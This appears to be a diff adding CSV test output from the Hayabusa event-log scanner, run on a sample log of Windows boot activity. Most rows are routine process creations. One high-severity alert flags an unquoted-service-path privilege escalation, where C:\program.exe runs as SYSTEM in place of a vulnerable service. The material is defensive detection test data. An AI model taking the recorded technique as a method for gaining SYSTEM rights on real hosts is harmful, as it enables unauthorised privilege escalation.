+2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe""  :  Path: C:\Windows\System32\dwm.exe  :  User: Window Manager\DWM-1  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0  :  Path: C:\Windows\System32\upfc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe  :  Path: C:\Windows\System32\dxgiadaptercache.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe  :  Path: C:\Windows\System32\wlms\wlms.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit  :  Command: c:\Program Files\vulnsvc\mmm.exe  :  Path: C:\program.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe  :  Path: C:\Windows\System32\sihost.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService  :  Path: C:\Windows\System32\svchost.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh  :  Path: C:\Windows\System32\rundll32.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications  :  Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
